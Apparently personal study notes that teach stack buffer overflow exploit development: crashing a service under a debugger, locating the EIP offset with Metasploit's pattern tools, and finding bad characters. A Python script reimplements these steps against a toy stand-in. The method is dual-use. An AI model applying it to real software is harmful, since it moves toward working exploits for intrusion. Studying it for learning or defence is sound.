So the whole section continues to be a chaos. So instead of repairing the broken chapters I am just going to start writing a new one, and see if I can have it make more sense this time.
You have an application that you know is vulnerable to a buffer overflow. These are the steps to exploit it:
- Find the buffer overflow
- Find exact offset
- Identify bad characters
First we need to find where it is. We attach the process to a debugger (Immunity Debugger, OllyDbg) and then send it progressively larger inputs until we reach the length at which the application crashes. If the saved return address was overwritten, the debugger shows EIP filled with our filler bytes (41414141 if we sent As), which tells us we control EIP and roughly how many bytes it took.
Now we need the exact offset at which the saved return address (EIP) gets overwritten. Metasploit ships two tools for this. First we create a non-repeating pattern of the length that crashed the application, like this:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700
This will return something like this:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A...
So we modify our exploit script to send the pattern as the payload, run it again, and read the value sitting in EIP when the application crashes in our debugger.
We take that hex value (EIP exactly as the debugger shows it) and feed it to the second tool, which searches the pattern for those four bytes and returns their offset. The -l value must be at least the length of the pattern we actually sent, otherwise the lookup fails. Like this:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 700
# Stdout
[*] Exact match at offset 605
So now we know the exact offset: the four bytes at offset 605 of our input are the ones that end up in EIP. We can now modify our exploit script to send filler up to that offset followed by a distinctive four-byte string (for example BBBB), and check that EIP reads 42424242 in the debugger to make sure everything is working as expected.
Now it is time to start developing our malicious payload. But before we do that we need to know which bad characters the application has, so the shellcode can avoid them. We can find them by sending every byte value in the buffer and comparing, in the debugger, what arrives in memory with what we sent.
Here are all byte values from \x01 to \xff (\x00 is left out because it is almost always bad). If a byte is dropped, altered, or cuts the rest of the buffer short, it is a bad character. Only the first mismatch is trustworthy: once one byte is mangled everything after it shifts, so remove that byte from the list, send again, and repeat until the buffer arrives intact.
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
Common bad characters are:
- \x00 - Null byte (string terminator)
- \x0a - New line (line feed)
- \x0d - Carriage return
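The three steps above as one script, added here as a worked example (this is not code from the original notes and not the Metasploit tools themselves). It reimplements pattern_create.rb and pattern_offset.rb in Python so the offset lookup is visible, builds the EIP control check, and runs the bad-character loop. The vulnerable service is replaced by a constructed stand-in: the buffer size of 605 and the bytes it strips (\x0a and \x0d) are assumptions for the demo, not measurements of any real target.

```python
"""Added example: cyclic pattern, offset lookup and bad-character discovery."""
import string
import struct

# Assumed stand-in for the target: saved return address sits 605 bytes into the input.
BUF_SIZE = 605


def cyclic_pattern(length: int) -> bytes:
    """Same sequence as pattern_create.rb (Aa0Aa1...Aa9Ab0...); no 4-byte
    window repeats within the first 20280 bytes."""
    out = bytearray()
    while len(out) < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += (upper + lower + digit).encode()
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_hex: str):
    """Like pattern_offset.rb -q: the debugger shows EIP as a 32-bit value, so
    pack it little-endian to get the four pattern bytes that landed in it.
    Returns None when the value is not in the pattern (wrong length sent)."""
    value = int(eip_hex, 16)
    idx = pattern.find(struct.pack("<I", value))
    if idx == -1:
        # Some tools print the bytes in memory order; try big-endian too.
        idx = pattern.find(struct.pack(">I", value))
    return None if idx == -1 else idx


def build_payload(offset: int, eip: bytes, total: int) -> bytes:
    """Control check: filler up to the offset, a 4-byte marker that should
    appear in EIP, then padding so the input keeps the crashing length."""
    assert len(eip) == 4
    return b"A" * offset + eip + b"C" * (total - offset - 4)


def toy_target(data: bytes) -> bytes:
    """Constructed stand-in for the crash: returns the 4 bytes that overwrite
    the saved return address, or b"" if the input is too short to reach it."""
    return data[BUF_SIZE:BUF_SIZE + 4] if len(data) >= BUF_SIZE + 4 else b""


def eip_as_debugger_shows(saved_ret: bytes) -> str:
    """Immunity/Olly display EIP as a little-endian 32-bit value, e.g. 39694438."""
    return "%08x" % struct.unpack("<I", saved_ret)[0]


def badchar_buffer(exclude=(0x00,)) -> bytes:
    """\x01..\xff minus the bytes already known to be bad (\x00 always)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent: bytes, received: bytes):
    """Compare what we sent with what the debugger shows in memory. Only the
    first difference is meaningful: after a dropped or mangled byte everything
    shifts, so report it, exclude it, and resend."""
    for i, b in enumerate(sent):
        if i >= len(received) or received[i] != b:
            return b
    return None


def find_bad_chars(send, known=(0x00,)) -> set:
    """Drive the loop: send, compare, exclude, repeat until the buffer is intact.
    `send` is a callable returning the bytes as they arrived in memory."""
    bad = set(known)
    while True:
        buf = badchar_buffer(exclude=bad)
        b = first_bad_char(buf, send(buf))
        if b is None:
            return bad
        bad.add(b)


def toy_memory_dump(data: bytes) -> bytes:
    """Constructed target behaviour: input ends at the first \n, and \r is dropped."""
    return data.split(b"\x0a")[0].replace(b"\x0d", b"")


if __name__ == "__main__":
    probe = cyclic_pattern(700)                      # step 2: send the pattern
    shown = eip_as_debugger_shows(toy_target(probe))  # read EIP from the debugger
    off = pattern_offset(probe, shown)
    print("EIP=%s -> offset %s" % (shown, off))
    check = build_payload(off, b"BBBB", 700)         # control check
    print("EIP after control check:", eip_as_debugger_shows(toy_target(check)))
    print("bad chars:", sorted(find_bad_chars(toy_memory_dump)))  # step 3
```

The offset returned depends on the length of the pattern that was actually sent: if the EIP value is not found within that length, `pattern_offset` returns None instead of a number, which is the same situation as running pattern_offset.rb with too small an -l. The bad-character loop deliberately trusts only the first mismatch per round, which is why it resends after every byte it excludes.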